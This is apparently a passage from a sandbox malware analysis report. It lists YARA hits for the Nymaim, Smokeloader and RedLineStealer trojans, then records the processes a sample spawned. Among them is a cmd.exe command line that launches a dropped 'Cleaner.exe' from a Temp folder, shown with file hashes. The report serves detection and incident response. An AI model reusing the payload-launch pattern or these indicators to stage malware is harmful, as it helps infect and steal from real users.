                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Target ID:2
                                                          Start time:17:32:04
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:4
                                                          Start time:17:32:07
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:6
                                                          Start time:17:32:09
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:8
                                                          Start time:17:32:12
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:13
                                                          Start time:17:32:19
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:20
                                                          Start time:17:32:22
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:24
                                                          Start time:17:32:25
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:27
                                                          Start time:17:32:29
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:30
                                                          Start time:17:32:50
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:31
                                                          Start time:17:32:53
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:32
                                                          Start time:17:32:55
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:33
                                                          Start time:17:32:55
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
                                                          Imagebase:0x24b7b8b0000
                                                          File size:3947920 bytes
                                                          MD5 hash:04514BD4962F7D60679434E0EBE49184
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:39
                                                          Start time:17:33:24
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
                                                          Imagebase:0x1140000
                                                          File size:434592 bytes
                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          No disassembly